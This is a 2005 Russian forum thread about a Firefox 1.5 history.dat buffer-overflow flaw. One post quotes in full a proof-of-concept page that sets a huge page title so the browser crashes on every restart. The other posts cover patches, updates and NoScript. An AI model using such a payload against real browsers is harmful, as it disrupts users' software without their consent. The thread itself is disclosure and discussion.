>Форум Mozilla Россия http://forum.mozilla-russia.org/index.php >Firefox http://forum.mozilla-russia.org/viewforum.php?id=4 >Эксплоит уязвимости Firefox 1.5 http://forum.mozilla-russia.org/viewtopic.php?id=6788 |
Whyesker > 08-12-2005 00:22:52 |
Опубликован исходный код (в виде javascript-кода), который использует уязвимость браузера Firefox 1.5. Принцип действия его довольно прост. Как пишет автор, Firefox использует для сохранения всех посещённых URL файл history.dat. Созданный скрипт сохраняет в этом файле очень большой топпик. В результате при следующей загрузке браузера происходит его постоянное зависание из-за переполнения буфера. Для устранения последствий рекомендуется ручное удаления файла history.dat. Источник: Нигде не нашел инфы про это. Иправили или как? |
stEp > 08-12-2005 12:22:51 |
А вот и секлаб проснулся http://www.securitylab.ru/poc/242790.php |
alc > 08-12-2005 13:23:00 |
Выделить код Код:<!-- Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file -- which most users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2. ZIPLOCK <sickbeatz@gmail.com> --> <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> Уязвимость не такая страшная, думаю быстро заткнут. |
Mash > 08-12-2005 18:55:39 |
alc пишет
1) Что подумают домохозяйки на краши браузера при запуске? Кто им скажет, что нужно удалять какой-то файл? Ведь по легенде создавали его именно для них. 2) На фоне обновлений патчами и быстроты латания дыр "страха" меньше, согласен; но сама дыра... Она даже не страшная, она какая-то дурацкая. Хотя... со всеми бывает. |
djet > 08-12-2005 19:11:10 |
С этим history.dat и раньше проблемы были.. Наверное, его формат не менялся со времён нетшкафа, так и работает годы без капремонта. |
Pr. > 08-12-2005 20:17:13 |
> Уязвимость не такая страшная Ну, я бы сказал бы по поводу страшных уязвимостей. Просто все равно очень не приятно. Буду очень признателен, если за каким номером в багзилле эта уязвимость идет. |
Unghost > 09-12-2005 01:08:45 |
Уже есть патчи. |
cr@nk > 09-12-2005 05:59:36 |
Автообновление? |
igorsub > 09-12-2005 06:57:13 |
Нажимал "Прверить наличие обновлений..." — тишина. |
Brem > 09-12-2005 10:09:04 |
а на меня эксплоит не сработал |
Ven > 09-12-2005 16:54:28 |
У меня Firefox 1.5 RU. |
cr@nk > 09-12-2005 17:38:28 |
Тут многие автообновление ждут с 1.5 RC2 |
Viper > 09-12-2005 17:40:06 |
Ven он ещё в виде исходного кода. |
Alv > 09-12-2005 18:14:39 |
Гентушники уже пофиксили. А я всё патча с RC2 жду. |
Brem > 09-12-2005 18:48:50 |
cr@nk пишет
а вы слезте с канала бета тестирования на release |
Viper > 09-12-2005 18:53:13 |
Brem обновление ещё не вышло |
Alv > 09-12-2005 19:12:00 |
NoScript вроде его блокирует. |
cr@nk > 09-12-2005 19:24:09 |
Brem пишет
Так я не про себя |
KDA > 09-12-2005 21:30:45 |
По поводу уязвимости: несколько личностей (причём здесь под словом личность я подразумеваю исключительно негативную оценку социальных качеств) заранее, задолго до того, как уязвимось приобрела широкую известность, знали о ней. Напомню, что уязвимость касается обработки скрипта и внесения кода в history.dat. Уверен на 100%. |
Viper > 09-12-2005 21:33:10 |
KDA #$%#@#!!! (эт я не про тебя |
Pr. > 09-12-2005 22:52:20 |
Unghost пишет Спасибо за ссылочку |
jedy > 09-12-2005 22:54:46 |
Unghost пишет и что делать с этим патчем? как его применить? подскажите плиз |
Viper > 09-12-2005 23:02:29 |
jedy Качаешь исходники, правишь их в соответствии с этим https://bugzilla.mozilla.org/attachment.cgi?id=205381&action=diff , компилируешь
|
Ven > 09-12-2005 23:29:18 |
Я - олень |
jedy > 09-12-2005 23:36:18 |
Viper пишет
извени,не понял-(, |
Viper > 09-12-2005 23:38:02 |
jedy Лучше не мучайся, а дождись нормального патча. |
roopix > 09-12-2005 23:51:21 |
кто посмел поднять руку на Firefox? меня удивляет поведение этих личностей (если, конечно, они не из M$): Firefox просто спокойно развивающийся браузер, кому нужно бросать тень на его разработчиков?.. ужас, короче говоря!.. |
Unghost > 10-12-2005 04:27:35 |
Когда я говорил про патчи, я имел в виду патчи к багу, не бинарные патчи. |